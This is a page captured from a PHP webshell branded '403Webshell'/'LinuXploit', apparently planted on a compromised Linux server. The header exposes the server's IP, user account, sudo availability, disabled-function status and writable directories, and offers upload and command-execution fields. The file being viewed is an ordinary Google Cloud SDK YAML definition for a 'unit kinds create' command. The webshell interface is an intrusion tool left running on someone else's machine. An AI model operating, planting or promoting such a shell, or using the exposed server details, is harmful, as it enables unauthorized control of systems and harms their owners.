403Webshell
Server IP : 35.236.43.222  /  Your IP : 216.73.216.143
Web Server : Apache
System : Linux order-form-vm-001 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64
User : deploy ( 1002)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/google-cloud-sdk/lib/surface/saas/unit_kinds/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/google-cloud-sdk/lib/surface/saas/unit_kinds/create.yaml
- release_tracks:
  - ALPHA
  help_text:
    brief: Create a Unit Kind
    description: Create a Unit Kind
    examples: |-
      To create the Unit Kind, run:

      $ {command}
  arguments:
    params:
    - help_text: |-
        Identifier. The resource name (full URI of the resource) following the standard naming
        scheme:

          "projects/{project}/locations/{location}/unitKinds/{unitKind}"
      is_positional: true
      request_id_field: unitKindId
      resource_spec: !REF googlecloudsdk.command_lib.saas.resources:unit_kind
      required: true
    - arg_name: default-release
      help_text: |-
        A reference to the Release object to use as default for creating new units
        of this Unit Kind (optional).

        If not specified, a new unit must explicitly reference which release to use
        for its creation.
      is_positional: false
      resource_spec: !REF googlecloudsdk.command_lib.saas.resources:release
      resource_method_params:
        unitKind.defaultRelease: '{__relative_name__}'
      required: false
    - arg_name: saas-type
      help_text: |-
        A reference to the Saas Type that defines the product (managed service) that
        the producer wants to manage with Saas Service Management.
      is_positional: false
      resource_spec: !REF googlecloudsdk.command_lib.saas.resources:saas_type
      resource_method_params:
        unitKind.saasType: '{__relative_name__}'
      required: false
    - arg_name: dependencies
      api_field: unitKind.dependencies
      required: false
      repeated: true
      help_text: |-
        List of other unit kinds that this release will depend on. Dependencies
        will be automatically provisioned if not found. Maximum 10.
      spec:
      - api_field: unitKind
        resource_pattern: projects/{project}/locations/{location}/unitKinds/{unitKind}
        help_text: |-
          The unit kind of the dependency.
      - api_field: alias
        help_text: |-
          An alias for the dependency. Used for input variable mapping.
    - arg_name: input-variable-mappings
      api_field: unitKind.inputVariableMappings
      required: false
      repeated: true
      help_text: |-
        List of inputVariables for this release that will either be retrieved from
        a dependency's outputVariables, or will be passed on to a dependency's
        inputVariables. Maximum 100.
      spec:
      - api_field: variable
        help_text: |-
          name of the variable
      - arg_name: from
        api_field: from_
        help_text: |-
          Output variables which will get their values from dependencies
        spec:
        - api_field: dependency
          help_text: |-
            Alias of the dependency that the outputVariable will pass its value to
        - api_field: outputVariable
          help_text: |-
            Name of the outputVariable on the dependency
      - api_field: to
        help_text: |-
          Input variables whose values will be passed on to dependencies.
        spec:
        - api_field: dependency
          help_text: |-
            Alias of the dependency that the inputVariable will pass its value to
        - api_field: inputVariable
          help_text: |-
            Name of the inputVariable on the dependency
        - api_field: ignoreForLookup
          help_text: |-
            Indicates if this mapping should be used during lookup or not
    - arg_name: output-variable-mappings
      api_field: unitKind.outputVariableMappings
      required: false
      repeated: true
      help_text: |-
        List of inputVariables for this release that will either be retrieved from
        a dependency's outputVariables, or will be passed on to a dependency's
        inputVariables. Maximum 100.
      spec:
      - api_field: variable
        help_text: |-
          name of the variable
      - arg_name: from
        api_field: from_
        help_text: |-
          Output variables which will get their values from dependencies
        spec:
        - api_field: dependency
          help_text: |-
            Alias of the dependency that the outputVariable will pass its value to
        - api_field: outputVariable
          help_text: |-
            Name of the outputVariable on the dependency
      - api_field: to
        help_text: |-
          Input variables whose values will be passed on to dependencies.
        spec:
        - api_field: dependency
          help_text: |-
            Alias of the dependency that the inputVariable will pass its value to
        - api_field: inputVariable
          help_text: |-
            Name of the inputVariable on the dependency
        - api_field: ignoreForLookup
          help_text: |-
            Indicates if this mapping should be used during lookup or not
    - arg_name: labels
      api_field: unitKind.labels
      required: false
      repeated: true
      help_text: |-
        The labels on the resource, which can be used for categorization.
        similar to Kubernetes resource labels.
      spec:
      - api_field: key
      - api_field: value
  request:
    api_version: v1alpha1
    collection:
    - saasservicemgmt.projects.locations.unitKinds
  async:
    collection:
    - saasservicemgmt.projects.locations.operations

Youez - 2016 - github.com/yon3zu
LinuXploit